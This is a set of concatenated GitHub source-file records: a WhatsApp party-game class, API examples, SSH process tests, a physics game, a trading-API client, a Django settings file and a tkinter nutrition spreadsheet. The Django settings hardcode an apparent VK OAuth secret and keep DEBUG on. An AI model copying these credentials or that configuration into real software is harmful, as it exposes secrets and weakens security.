joueur.get_name() + \" (\" + joueur.phone + \") :\\n\"\n string += data[\"body\"]\n messagebox.showinfo(f\"Message de {data['_data']['notifyName']}\", string)\n return \"OK\", 200\n\n @app.post(\"/disconnected\")\n def disconnected():\n self.pause = True\n self.pause_reason = \"WhatsApp s'est déconnecté\"\n self.set_pause_game()\n messagebox.showerror(\"Erreur\", \"WhatsApp s'est déconnecté.\\nMerci de bien vouloir vérifier votre connexion.\")\n return \"OK\", 200\n\n @app.post(\"/media_uploaded\")\n def media_uploaded():\n print(request.json)\n return \"OK\", 200\n\n @app.post(\"/message_reaction\")\n def message_reaction():\n print(request.json)\n return \"OK\", 200\n\n self.flt = flt = Thread(target=lambda: app.run(port=3046, debug=False))\n flt.daemon = True\n flt.start()\n\n super().__init__(game_master)\n\n def import_players(self):\n used_passwords: list = []\n used_id: list = []\n if self.config[\"register_type\"] == \"liste\": \n with open(\"players.json\", \"r\", encoding='utf-8') as f:\n data = json.load(f)\n self.players = [SMSPlayer(player[\"name\"], player[\"phone\"], used_passwords, used_id)\n for player in data if player.get(\"play\", True) and player.get(\"type\", \"\") == \"sms\"]\n else:\n already_started: bool = self.import_window is not None\n if self.import_window:\n clear_frame(self.import_window)\n popup = self.import_window\n else:\n self.import_window = popup = Tk()\n popup.title(\"Importation des joueurs\")\n popup.geometry(\"300x200\")\n popup.resizable(True, True)\n popup.iconbitmap(self.path + \"/assets/img/amongus.ico\")\n popup.state(\"zoomed\")\n self.register_code = \"\".join([str(random.randint(0, 9)) for _ in range(5)])\n \n def start_game() -> None:\n \"\"\"\n Démarre la partie, une fois que les joueurs sont importés\n :return: None\n \"\"\"\n self.import_window = None\n self.players = [player for player in self.players if player is not None]\n popup.destroy()\n self.register_code = None\n self.start_game()\n return None\n \n def 
closing():\n \"\"\"\n Fonction de fermeture de la fenêtre\n \"\"\"\n if messagebox.askokcancel(\"Quitter\", \"Êtes vous sûr de quitter ?\"):\n popup.destroy()\n self.window.destroy()\n \n popup.protocol(\"WM_DELETE_WINDOW\", closing)\n \n main_frame = Frame(popup)\n \n qrcode_frame = Frame(main_frame)\n \n whatsapp_user = get_user()\n \n url_label = Label(qrcode_frame, text=f\"Envoyez {self.register_code} à {show_phone_number(whatsapp_user['wid'])} pour vous enregistrer\", font=(\"Arial\", 28))\n url_label.pack()\n \n qrcode_frame.pack(fill=BOTH, expand=True)\n \n valid_players = [player for player in self.players if player is not None]\n \n start_button = Button(main_frame, text=\"Démarrer la partie\", command=start_game)\n \n if len(valid_players) < 4:\n start_button.config(state=DISABLED)\n \n start_button.pack()\n \n import_players_frame = VerticalScrolledFrame(main_frame)\n \n for player in valid_players:\n player_frame = Frame(import_players_frame)\n \n player_label = Label(player_frame, text=player.get_name(), font=(\"Arial\", 28))\n player_label.pack()\n \n player_frame.pack(fill=BOTH, expand=True)\n \n import_players_frame.pack(fill=BOTH, expand=True)\n \n main_frame.pack(fill=BOTH, expand=True)\n \n if not already_started:\n popup.mainloop()\n print(\"Joueurs importés\")\n\n def send_info_all(self, message: str):\n print(\"Envoie de l'information\")\n for player in self.players:\n new_message = message.replace(\"{name}\", player.name)\n # replace the variable in the message\n new_message = new_message.replace(\"{role}\", self.config[\"names\"][player.role])\n new_message = new_message.replace(\"{id}\", player.id)\n new_message = new_message.replace(\"{phone}\", player.phone)\n new_message = new_message.replace(\"{tasks}\", \"\\n\".join([task.name for task in player.tasks]))\n new_message = new_message.replace(\"{password}\", player.password)\n\n print(player.name, \":\", new_message)\n send_message(player.phone, new_message)\n\n def send_info(self, player: SMSPlayer, message: str):\n print(player.name, \":\", message)\n send_message(player.phone, message)\n\n def send_role(self, player) -> None:\n \"\"\"\n Envoie un sms au joueur indiquant son role et ses tâches\n :param player: SMSPlayer: Le joueur avec son numéro de téléphone\n \"\"\"\n message = f\"Bonjour {player.get_name()},\\n\"\n message += \"Vous êtes un \" + self.config[\"names\"][player.role].upper()\n if player.role == \"impostor\" and len(self.impostors) > 1:\n impostors = \" \".join([(joueur.get_name()) for joueur in self.impostors])\n message += \" avec \" + impostors + \"\\n\\n\"\n else:\n message += \"\\n\\n\"\n message += \"Vos tâches sont:\\n\"\n for i in range(len(player.tasks)):\n task = player.tasks[i]\n message += f\"{i + 1}: {task.name} ({task.steps} étapes)\\n\"\n message += \"\\n\"\n message += f\"Votre identifiant est {player.id}\\n\"\n message += \"\\n\"\n message += \"Pour voir toutes les commandes, vous pouvez taper \\\"help\\\"\\n\"\n message += \"Nous vous souhaitons une bonne partie !\"\n\n self.send_messages.append(message)\n self.send_info(player, message)\n\n def check_command(self, player, message: dict) -> bool:\n \"\"\"\n Vérifie si jamais le content reçu est une commande ou un content validant une tâche. 
Si c’est le cas, on l'exécute\n :param player: SMSPlayer: Le joueur qui a envoyé le content\n :param message: str: le contenu du content reçu\n :return: bool: Si jamais le content était bien une commande\n \"\"\"\n content = message[\"body\"].lower()\n for cmd in commands:\n if content.startswith(tuple([cmd.name] + cmd.aliases)):\n return cmd.run(player, content, message, self)\n if self.unpause_code in content and self.pause:\n self.unpause_game()\n return True\n for task in player.tasks:\n if task.type == \"validate_basic\":\n for word in task.keywords:\n if word in content:\n self.task_done(player, task)\n return True\n elif task.type == \"activate_basic\":\n for word in task.activ_keywords:\n if word in content:\n send_message(player.phone, f\"La tâche {task.name} vous envoie:\\n{task.message}\")\n task.active = True\n return True\n elif task.type == \"activ_valid\":\n for word in task.keywords:\n if word in content:\n if task.active:\n self.task_done(player, task)\n send_message(player.phone, \"Vous avez bien validé la tâche !\")\n return True\n else:\n send_message(player.phone, \"La tâche n'est pas encore activée\")\n return True\n for word in task.activ_keywords:\n if word in content:\n send_message(player.phone, f\"La tâche {task.name} vous envoie:\\n{task.message}\")\n task.active = True\n return True\n\n return False\n\n\nif __name__ == '__main__':\n WhatsAppGame(True)\n","repo_name":"Merlode11/Among-Us-Real","sub_path":"whatsapp/whatsapp_game_class.py","file_name":"whatsapp_game_class.py","file_ext":"py","file_size_in_byte":12507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12533416020","text":"\"\"\"\nNeurodataLab LLC 09.12.2019\nCreated by Andrey Belyaev\n\"\"\"\nimport argparse\nfrom ndlapi.api import create_credentials, get_service_by_name, images_services_list\nfrom streaming_processing import WebCamFaceDetectorStreamProcessing\n\n\ndef parse():\n \"\"\"\n Parse command line arguments\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--keys-path', required=True, type=str,\n help='Path to folder with keys downloaded from api.neurodatalab.dev')\n parser.add_argument('--service', required=True, type=str,\n help='Service to process video. Available services: %s' % str(images_services_list))\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n # Parse command line arguments\n args = parse()\n\n # Check service type. This example works only with Face Detector\n assert args.service in ('FaceDetector', 'fd'), 'Only Face Detector service is available in example'\n\n # Create ssl authorization token\n ssl_auth = create_credentials(args.keys_path)\n # Create service\n service = get_service_by_name(args.service, ssl_auth)\n\n # Initialize webcam streaming class\n webcam_streamer = WebCamFaceDetectorStreamProcessing(service)\n # Start streaming\n webcam_streamer.start_streaming()\n","repo_name":"NeurodataLab/ndlapi-streaming-exercise","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3334191605","text":"# pylint: disable=c0111\n\nimport unittest\n\nfrom asynciojobs import Scheduler\n\nfrom apssh import SshJob, LocalNode, Run, RunScript, RunString, SshNode\nfrom apssh import HostFormatter, load_private_keys, CommandFailedError\n\n#from apssh.util import co_close_ssh_from_sched\n\nfrom . import util\n#from . 
import utilps\n\nclass Tests(unittest.TestCase):\n\n def _allowed_signal(self, allowed_exits,\n host=\"localhost\", username=None):\n\n print(f\"Testing allowed signal allowed_exits={allowed_exits}\")\n\n # global timeout\n total = 4\n # scheduled duration\n long = 2\n # send signal after that amount\n short = 1\n # we always kill with TERM\n signal = \"TERM\"\n\n if username is None:\n username = util.localuser()\n node = SshNode(host, username=username)\n\n scheduler = Scheduler(timeout = total, critical=False)\n SshJob(node=node, scheduler=scheduler,\n command=Run(f\"sleep {long}\",\n allowed_exits=allowed_exits))\n SshJob(node=node, scheduler=scheduler,\n command=f\"sleep {short}; pkill -{signal} sleep\")\n\n expected = signal in allowed_exits\n\n run = scheduler.run()\n scheduler.list()\n self.assertEqual(run, expected)\n\n def test_allowed_signal_regular(self):\n self._allowed_signal(allowed_exits=[])\n def test_allowed_signal_term(self):\n self._allowed_signal(allowed_exits=['TERM'])\n def test_allowed_signal_term_mix(self):\n self._allowed_signal(allowed_exits=['TERM', 100])\n def test_allowed_signal_term_foreign(self):\n self._allowed_signal(allowed_exits=[100])\n\n\n\n def _allowed_retcod(self, allowed_exits,\n host=\"localhost\", username=None):\n\n print(f\"Testing allowed retcod allowed_exits={allowed_exits}\")\n\n # global timeout\n total = 4\n # scheduled duration\n long = 1\n # we always exit code 100\n retcod = 1000\n\n if username is None:\n username = util.localuser()\n node = SshNode(host, username=username)\n\n scheduler = Scheduler(timeout = total, critical=False)\n SshJob(node=node, scheduler=scheduler,\n command=Run(f\"sleep {long}; exit {retcod}\",\n allowed_exits=allowed_exits))\n\n expected = retcod in allowed_exits\n\n run = scheduler.run()\n scheduler.list()\n self.assertEqual(run, expected)\n\n def test_allowed_retcod_regular(self):\n self._allowed_retcod(allowed_exits=[])\n def test_allowed_retcod_term(self):\n self._allowed_retcod(allowed_exits=[100])\n def test_allowed_retcod_term_mix(self):\n self._allowed_retcod(allowed_exits=['TERM', 100])\n def test_allowed_retcod_term_foreign(self):\n self._allowed_retcod(allowed_exits=[100])\n","repo_name":"parmentelat/apssh","sub_path":"tests/test_processes.py","file_name":"test_processes.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"71813682066","text":"#!/usr/bin/env python\n# SpaceTime Class\n\"\"\" Each SpaceTime will be like an alternate timeline of the current\n running game. Most of the time I'm guessing I'll handle one (or even none),\n but I want this to be the class responsible for handling the timeline, splitting,\n rewinding and all the events that occur in the world should probably be logged\n in the SpaceTime continuum. Mmmm... 
continuum.\n\n\"\"\"\nfrom game.libs import *\nfrom game.classes import *\nimport time\nfrom game.classes.basics import PhysicalWorld\nfrom game.classes.elements.Wall import Wall\nfrom game.classes.elements.Atom import Atom\nfrom game.classes.elements.Energy import Energy\nfrom game.classes.elements.Charge import Charge\nfrom game.classes.elements.Player import Player\n\nclass SpaceTime:\n def __init__(self, GameObject):\n self._Game = GameObject\n self._id = make_hash()\n self._PhysicalWorld = PhysicalWorld()\n self._PhysicalWorld.set_collision_handler(begin=self.collision_begin_func, pre_solve=self.collision_pre_solve_func)\n\n self._teams = {}\n self._players = {}\n self._objects = []\n self._visible_objects = []\n self._prev_step_time = 0\n self._curr_step_time = 0\n self._events_dict = {0:'init'}\n\n def _get_PhysicalWorld(self):\n return self._PhysicalWorld\n\n def _set_PhysicalWorld(self, PhysicalWorldObject):\n if isinstance(PhysicalWorldObject, PhysicalWorld):\n self._PhysicalWorld = PhysicalWorldObject\n\n PhysicalWorld = property(_get_PhysicalWorld, _set_PhysicalWorld)\n\n def get_teams(self):\n return self._teams\n\n def get_players(self):\n return self._players\n\n def get_visible_objects(self):\n return self._visible_objects\n\n def get_objects(self):\n return self._objects\n\n def step(self, step):\n self._prev_step_time = self._curr_step_time\n self._curr_step_time = step\n self._PhysicalWorld.step(step)\n return self._prev_step_time\n\n def collision_begin_func(self, space, arbiter, *args):\n # self.collision_pre_solve_func(space, arbiter, args, register=False)\n return True\n\n def collision_pre_solve_func(self, space, arbiter, *args, **kwargs):\n \"\"\"For each contact, register the collision and figure\n out what to do. \"\"\"\n GameObjects = []\n EnergyObjects = []\n ChargeObjects = []\n AtomObjects = []\n if 'register' in kwargs:\n register = kwargs['register']\n else:\n register = True\n for shape in arbiter.shapes:\n if hasattr(shape, 'game_object'):\n game_object = shape.game_object\n GameObjects.append(game_object)\n if isinstance(game_object, Atom):\n AtomObjects.append(game_object)\n elif isinstance(game_object, Energy):\n EnergyObjects.append(game_object)\n elif isinstance(game_object, Charge):\n ChargeObjects.append(game_object)\n else:\n self._PhysicalWorld.remove(shape)\n\n\n if len(EnergyObjects) == 1 and len(AtomObjects) == 1:\n if register:\n self._Energy_Atom_collision_func(EnergyObjects[0], AtomObjects[0])\n return False\n\n if len(AtomObjects) == 2:\n if register:\n self._Atom_Atom_collision_func(AtomObjects)\n return True\n\n return True\n\n def _Energy_Atom_collision_func(self, EnergyObject, AtomObject):\n AtomObject.contact_Energy(EnergyObject)\n return False\n\n def _Atom_Atom_collision_func(self, AtomObjects):\n return True\n\n def new_Energy(self, PlayerObject, position, energy, **kwargs):\n EnergyObject = Energy(self._Game, PlayerObject, position, energy, **kwargs)\n self._objects.append(EnergyObject)\n self._visible_objects.append(EnergyObject)\n return EnergyObject\n\n def new_Atom(self, position, angle, skill, *args, **kwargs):\n AtomObject = Atom(self._Game, position, angle, skill, *args, **kwargs)\n self._objects.append(AtomObject)\n self._visible_objects.append(AtomObject)\n return AtomObject\n\n def new_Wall(self, a, b, thickness, **kwargs):\n WallObject = Wall(self._Game, a, b, thickness, **kwargs)\n self._objects.append(WallObject)\n self._visible_objects.append(WallObject)\n return WallObject\n\n def new_Player(self):\n PlayerObject = 
Player()\n id = PlayerObject.id\n self._players[ id ] = PlayerObject\n return PlayerObject\n\n def del_Element(self, ElementObject):\n if ElementObject in self._objects:\n self._objects.remove(ElementObject)\n if ElementObject in self._visible_objects:\n self._visible_objects.remove(ElementObject)","repo_name":"Maaack/SixX","sub_path":"code/game/classes/elements/SpaceTime.py","file_name":"SpaceTime.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"27022745941","text":"from neo_api_client import rest\nfrom neo_api_client import settings\nfrom neo_api_client.exceptions import ApiException\n\n\nclass ScripMasterAPI(object):\n def __init__(self, api_client):\n self.api_client = api_client\n self.rest_client = rest.RESTClientObject(api_client.configuration)\n\n def scrip_master_init(self, exchange_segment=None):\n URL = self.rest_client.configuration.get_url_details(\"scrip_master\")\n header_params = {'Authorization': \"Bearer \" + self.rest_client.configuration.bearer_token}\n\n try:\n scrip_report = self.rest_client.request(url=URL, method='GET', headers=header_params).json()[\"data\"]\n if exchange_segment:\n exchange_segment = settings.exchange_segment[exchange_segment]\n exchange_segment_csv = [file for file in scrip_report[\"filesPaths\"] if exchange_segment.lower() in file.lower()]\n if exchange_segment_csv:\n return exchange_segment_csv[0]\n else:\n return {\"Error\": \"Exchange segment not found\"}\n return scrip_report\n except ApiException as ex:\n return {\"error\": ex}\n","repo_name":"Kotak-Neo/kotak-neo-api","sub_path":"neo_api_client/api/scrip_master_api.py","file_name":"scrip_master_api.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"48"} +{"seq_id":"16514336261","text":"\"\"\"\nDjango settings for examenarium project.\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.0/topics/settings/\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/2.0/ref/settings/\n\"\"\"\n\nimport os\nimport django_heroku\n\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = \"CHANGE_ME!!!! (P.S. 
the SECRET_KEY environment variable will be used, if set, instead).\"\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n# Application definition\nINSTALLED_APPS = [\n \"widget_tweaks\",\n \"material.admin\", # material\n \"material.admin.default\", # material\n # \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n \"main\",\n \"homework\",\n \"media\",\n \"course\",\n \"swingtime\",\n 'social_django',\n]\n\n\nMIDDLEWARE = [\n \"django.middleware.security.SecurityMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n \"django.middleware.clickjacking.XFrameOptionsMiddleware\",\n]\n\nROOT_URLCONF = \"examenarium.urls\"\n\nSOCIAL_AUTH_POSTGRES_JSONFIELD = True\nSOCIAL_AUTH_VK_OAUTH2_KEY = '7240344'\nSOCIAL_AUTH_VK_OAUTH2_SECRET = 'EiC09dNPbpLlUBjo6FxQ'\nSOCIAL_AUTH_VK_OAUTH2_SCOPE = ['email']\n\nTEMPLATES = [\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"DIRS\": ['templates'],\n \"APP_DIRS\": True,\n \"OPTIONS\": {\n \"context_processors\": [\n \"django.template.context_processors.debug\",\n \"django.template.context_processors.request\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.contrib.messages.context_processors.messages\",\n 'social_django.context_processors.backends'\n ]\n },\n }\n]\n\nWSGI_APPLICATION = \"examenarium.wsgi.application\"\n\n\n# https://docs.djangoproject.com/en/2.0/ref/settings/#databases\n\nDATABASES = {\n \"default\": {\n \"ENGINE\" : \"django.db.backends.sqlite3\",\n \"NAME\": os.path.join(BASE_DIR, \"db.sqlite3\")\n }\n}\n\n# User substitution\n# https://docs.djangoproject.com/en/1.11/topics/auth/customizing/#auth-custom-user\n\nAUTH_USER_MODEL = 'main.User'\nAUTHENTICATION_BACKENDS = ['examenarium.auth.EmailBackend',\n 'social_core.backends.vk.VKOAuth2',\n 'django.contrib.auth.backends.ModelBackend',]\n\n# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n # {\"NAME\": \"django.contrib.auth.password_validation.UserAttributeSimilarityValidator\"},\n {\"NAME\": \"django.contrib.auth.password_validation.MinimumLengthValidator\"},\n # {\"NAME\": \"django.contrib.auth.password_validation.CommonPasswordValidator\"},\n # {\"NAME\": \"django.contrib.auth.password_validation.NumericPasswordValidator\"},\n]\n\n\n# https://docs.djangoproject.com/en/2.0/topics/i18n/\n\nLANGUAGES = (\n ('ru', 'Russian'),\n ('en', 'English'),\n)\n\nLANGUAGE_CODE = \"ru\"\n\nTIME_ZONE = \"Europe/Moscow\"\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# https://docs.djangoproject.com/en/2.0/howto/static-files/\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')\nSTATIC_URL = \"/static/\"\n\ndjango_heroku.settings(locals())\n\nLOGOUT_REDIRECT_URL = '/'\nLOGIN_REDIRECT_URL = '/account/profile'\n","repo_name":"keni0k/examenarium","sub_path":"examenarium/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4138501681","text":"from tkinter import *\n\n\nfrom tkinter import ttk\n\nimport startpage\n\nfrom utilities import 
*\n\nclass ViewFoodsPage(Frame):\n\t\"\"\"Pseudo spreadsheet for adding, deleting, and viewing all foods.\"\"\"\n\tdef __init__(self, parent, controller):\n\t\tFrame.__init__(self, parent)\n\n\t\t# The column headers\n\t\tself.HEADERS = ('name', 'ss', 'unit', 'cal', 'carb', 'fat', 'protein', 'fiber', 'sugar')\n\n\t\t# The number of columns in the sheet; equal to the number of headers\n\t\tself.width = len(self.HEADERS)\n\n\t\t# The padding to add at the end of each column width\n\t\tself.COL_PADDING = 3\n\n\t\t# The padding between controls\n\t\tself.PADY_CONTROLS = 5\n\n\t\t# The width that each column should be\n\t\tself.col_widths = []\n\n\t\t#Init each col width to 0\n\t\tfor w in range(self.width):\n\t\t\tself.col_widths.append(0)\n\t\tself._calc_col_widths()\n\n\t\t\n\n\t\t# Create frames (controls frame and cells frame)\n\t\tself.frame_controls = Frame(self)\n\t\tself.frame_cells = Frame(self)\n\n\t\t# Put the frames on the window\n\t\tself.frame_controls.grid(row=0, column=0, sticky=N, padx=(10, 0), pady=(10, 0))\n\t\tself.frame_cells.grid(row=0, column=1, sticky=N, padx=10)\n\n\n\t\t# Create controls\n\t\tbtn_back = ttk.Button(self.frame_controls, text=\"Back\", command=lambda: controller.show_frame(\"StartPage\")) \n\t\t\n\t\t# Label for displaying that changes were saved\n\t\tself.lbl_status = Label(self.frame_controls, text=\"\", fg=\"green\")\t\t\n\t\tbtn_delete_checked = ttk.Button(self.frame_controls, text=\"Delete\", command=self.delete_checked)\n\t\tbtn_save_changes = ttk.Button(self.frame_controls, text=\"Save changes\", command=self.save_changes)\n\n\n\t\t\n\t\t# Put the controls on the grid\n\t\tbtn_back.grid(row=0, column=0, pady=self.PADY_CONTROLS)\n\t\tself.lbl_status.grid(row=4, column=0, pady=self.PADY_CONTROLS, padx=10)\n\t\tbtn_delete_checked.grid(row=5, column=0, pady=self.PADY_CONTROLS)\n\t\tbtn_save_changes.grid(row=6, column=0, pady=self.PADY_CONTROLS, padx=12) # padx of 10 to make optionmenus' size static\n\n\t\t# List of lists for the rows of cells in the sheet\n\t\t# each element in this list is a list of Entry widgets; each is a row. Each Entry in a row is a cell.\n\t\tself.rows = {}\n\n\t\t# List of lists. 
Rows (inner lists) are: [, ]\n\t\tself.checkbuttons = []\n\n\n\t\t# Create the sheet\n\t\tself.draw_sheet()\n\n\n\tdef draw_sheet(self):\n\t\t\"\"\"Draws the sheet; used for initializing the sheet.\n\t\tIf there are no foods to display, then a message is displayed to the user.\"\"\"\n\n\t\tall_foods = fooditemdao.retrieve_all_foods()\n\n\t\tif not all_foods:\n\t\t\treturn False\n\n\t\tself.create_col_headers()\n\n\t\tfor food in all_foods:\n\t\t\trow = self._draw_row(food)\n\n\n\tdef create_col_headers(self):\n\t\t\"\"\"Creates and places Labels with the column headers in row 0 of frame_cells\"\"\"\n\t\tfor i in range(self.width):\n\t\t\tl = Label(self.frame_cells, text=self.HEADERS[i].upper(), font=MONOSPACED_FONT)\n\t\t\tl.grid(row=0, column=i+1)\n\n\n\tdef _draw_row(self, food):\n\t\t\"\"\"Creates and draws a row in the sheet.\n\t\tEach cell will be filled with the appropriate data based on arg food.\"\"\"\n\n\t\trow = {}\n\t\tcb_var = IntVar()\n\t\tcb = ttk.Checkbutton(self.frame_cells, var=cb_var)\n\t\tcb.grid(row=len(self.rows)+1, column=0)\n\t\trow['cb'] = cb\n\t\trow['cb_var'] = cb_var\n\t\tfor i, h in enumerate(self.HEADERS):\n\t\t\te = ttk.Entry(self.frame_cells, font=MONOSPACED_FONT, width=self.col_widths[i])\n\t\t\te.insert(0, food.info[h])\n\t\t\tif i == 0:\n\n\t\t\t\te.config(foreground=\"black\", state=DISABLED)\n\t\t\trow[f\"{h}_entry\"] = e\n\t\t\te.grid(row=len(self.rows)+1, column=i+1)\n\t\tself.rows[food.name] = row\n\n\t\t\n\n\tdef _calc_col_widths(self):\n\t\t\"\"\"Calculates how wide columns need to be based on headers and avail data (if any)\"\"\"\n\n\t\t# Set the widths based on the headers\n\t\tfor i in range(self.width):\n\t\t\tself.col_widths[i] = len(self.HEADERS[i])\n\n\t\t# Set the widths based on the headers or the longest piece of data; whichever is longer\n\t\tall_foods = fooditemdao.retrieve_all_foods()\n\t\tif all_foods:\n\t\t\tfor i in range(self.width):\n\t\t\t\tfor food in all_foods:\n\t\t\t\t\tself.col_widths[i] = max(self.col_widths[i], len(str(food.info[self.HEADERS[i]])))\n\n\t\t# Add padding to the widths\n\t\tfor i in range(self.width):\n\t\t\tself.col_widths[i] += self.COL_PADDING\n\n\n\tdef _is_sheet_filled_out(self):\n\t\t\"\"\"Returns False if there are no rows/foods or if there are \n\t\tcells that are empty.\n\t\tElse returns True.\n\t\t\"\"\"\n\t\tif not self.rows:\n\t\t\treturn False\n\t\tfor row in self.rows.values():\n\t\t\tfor key in row.keys():\n\t\t\t\tif key == 'cb' or key == 'cb_var':\n\t\t\t\t\tcontinue\n\t\t\t\ttext = row[key].get()\n\t\t\t\tif text == '':\n\t\t\t\t\tmessagebox.showerror(\"Empty Cells Found\", \"Please fill out every cell\")\n\t\t\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\n\n\tdef delete_checked(self):\n\t\t\"\"\"Goes through the rows and finds all rows where the CB is selected.\n\t\tAdds the names of these rows to a list, then goes through the list and deletes\n\t\t(destroys) each row and removes the row dict from self.rows and deletes\n\t\tthe row's food from the DB.\"\"\"\n\n\t\t# list of names of foods to delete\n\t\tto_delete = []\n\n\t\t# finds which rows to mark for deletion\n\t\tfor key in self.rows.keys():\n\t\t\tif self.rows[key]['cb_var'].get() == 1:\n\t\t\t\tto_delete.append(self.rows[key]['name_entry'].get())\n\n\t\t# destroys and removes the rows marked for deletion\n\t\tfor key in to_delete:\n\t\t\tself._delete_row(self.rows[key], True)\n\n\t\t\t# deletes the food from fooditem 
DB\n\t\t\tfooditemdao.delete_food(key)\n\t\t\tproductdao.delete_product_by_foodname(key)\n\t\t\tmealdao.delete_food_with_name(key)\n\n\n\n\tdef _get_all_foods_from_sheet(self):\n\t\t\"\"\"Returns a list of FoodItems based off what's in the sheet\"\"\"\n\t\tfoods = []\n\n\t\tif not self._is_sheet_filled_out():\n\t\t\treturn False\n\n\t\tfor row in self.rows.values():\n\t\t\tfood = self._create_fooditem_from_row_dict(row)\n\t\t\tfoods.append(food)\n\n\t\treturn foods\n\n\tdef _create_fooditem_from_row_dict(self, row_dict):\n\t\t\"\"\"Returns a FoodItem representing the arg row_dict.\"\"\"\n\t\tfood = FoodItem()\n\t\tinfos = ('name_entry', 'ss_entry', 'unit_entry', 'cal_entry', 'carb_entry', \n\t\t\t\t'fat_entry', 'protein_entry', 'fiber_entry', 'sugar_entry')\n\t\tfood_info = []\n\t\tfor key in row_dict.keys():\n\t\t\tif key in infos:\n\t\t\t\tfood_info.append(row_dict[key].get())\n\t\tfood.set_info_from_string_list(food_info)\n\t\treturn food\n\n\tdef _get_food_from_current_row(self, row):\n\t\t\"\"\"Returns a FoodItem from info in arg row.\n\t\tChecking for validity of row should be done before calling this func.\"\"\"\n\t\tinfo = []\n\t\tfood = FoodItem()\n\t\tfor e in row:\n\t\t\tinfo.append(e.get())\n\t\tfood.set_info_from_string_list(info)\n\t\treturn food\n\n\n\n\n\t\t\n\tdef save_changes(self):\n\t\t# Validate all data in the sheet\n\t\t# Returns False early if any validation failss\n\n\t\t# Checks if every row is either totally full or totally empty\n\t\tif not self._is_sheet_filled_out():\n\t\t\treturn False\n\n\t\t# Checks that all number columns have valid data (no chars, no negatives)\n\t\tif not self.validate_number_columns():\n\t\t\treturn False\n\n\t\t# Update the fooditem and product DB.\n\t\tself.update_databases()\n\n\t\t# Recalculate column widths in case of name changes\n\t\tself._calc_col_widths()\n\n\t\t# clear rows and redraw sheet\n\t\tself.reset()\n\n\t\treturn True\n\n\n\n\tdef update_databases(self):\n\t\t\"\"\"Checks which foods have been modified (all but name can be changed).\n\t\tIf none were changed, 'No changes' is displayed.\n\t\tElse, changes are saved to the db and 'Changes saved' is displayed.\"\"\"\t\n\t\tsheet_foods = self._get_all_foods_from_sheet()\n\n\t\tdb_foods = fooditemdao.retrieve_all_foods()\n\t\tchanges_made = False\n\t\tfor i in range(len(db_foods)):\n\n\t\t\tif not sheet_foods[i].is_info_same(db_foods[i]):\n\t\t\t\tfood = sheet_foods[i]\n\t\t\t\tfooditemdao.update_food(sheet_foods[i], sheet_foods[i].name)\n\t\t\t\tchanged_product = Product()\n\t\t\t\tself.update_product_db(food)\n\t\t\t\tchanges_made = True\n\t\tif changes_made:\n\t\t\tself.lbl_status.config(text=\"Changes saved\")\n\n\t\telse:\n\t\t\tself.lbl_status.config(text=\"No changes\")\n\t\tself.lbl_status.after(2000, lambda: self.lbl_status.config(text=\"\"))\n\n\n\tdef update_product_db(self, food):\n\t\tif self._is_unit_different(food):\n\t\t\told_product = productdao.retrieve_products_by_name(food.name)[0]\n\n\t\t\ttup = (old_product.foodname, old_product.amount, food.unit, old_product.cost)\n\t\t\tnew_product = Product()\n\t\t\tnew_product.set_info_from_tuple(tup)\n\t\t\tproductdao.update_product(new_product)\n\n\n\n\tdef _is_unit_different(self, food):\n\t\t\"\"\"Checks if the arg food has a different unit than\n\t\tthe same row in the products DB's unit.\"\"\"\n\t\tproduct = productdao.retrieve_products_by_name(food.name)[0]\n\t\tif product.unit == food.unit:\n\t\t\treturn False\n\t\telse:\n\t\t\treturn True\n\n\n\tdef validate_number_columns(self):\n\t\t\"\"\"Validates the 
cells of a row in a number column.\n A number column is a column where the data should only be a number\n (and a positive one)\"\"\"\n\n # First check if any cells are empty\n if not self._is_sheet_filled_out():\n return False\n\n num_cols = ('ss', 'cal', 'carb', 'fat', 'protein', 'fiber', 'sugar')\n for row in self.rows.values():\n for key in row.keys():\n if key in num_cols:\n try:\n float(row[key].get())\n except ValueError:\n messagebox.showerror(f\"Error\", f\"Values in '{key}' column must be a valid number.\")\n return False\n if float(row[key].get()) < 0:\n messagebox.showerror(f\"Error\", f\"Values in column '{key}' must be positive.\")\n return False\n return True\n\n def _has_duplicate_names(self):\n \"\"\"Returns False if all names in the sheet are unique\n Displays an error and returns True otherwise.\n It is case sensitive (names can be the same if different capitalization)\n Doesn't validate whether rows are empty or not because this should be done before\n calling this function.\"\"\"\n 